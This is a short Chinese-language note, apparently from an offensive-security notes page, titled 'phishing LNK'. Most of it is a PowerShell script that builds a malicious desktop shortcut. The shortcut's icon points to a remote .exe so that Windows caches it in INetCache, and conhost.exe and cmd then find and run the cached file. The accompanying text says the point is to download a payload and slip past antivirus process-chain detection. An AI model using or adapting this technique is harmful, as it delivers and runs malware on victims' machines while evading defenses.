钓鱼lnk
$shell = New-Object -ComObject WScript.Shell;
$desktop = [System.Environment]::GetFolderPath('Desktop');
$shortcut = $shell.CreateShortcut("$desktop\qwqdanchun.lnk");
$shortcut.TargetPath = "C:\windows\system32\conhost.exe";
$shortcut.WindowStyle = 7;
$shortcut.Arguments = 'cmd.exe /c cd %USERPROFILE%\AppData\Local\Microsoft\Windows\INetCache & dir /s /B qwqdanchun*.exe | cmd.exe /k';
$shortcut.IconLocation = "https://127.0.0.1/qwqdanchun.exe?.ico";
$shortcut.Save();
利用icon缓存来下载文件,并用conhost绕过杀软对进程链的判断。(仅适用于win10,win7等缓存目录不同,有兴趣可以自行编写)
参考文章:
最近更新 2yr ago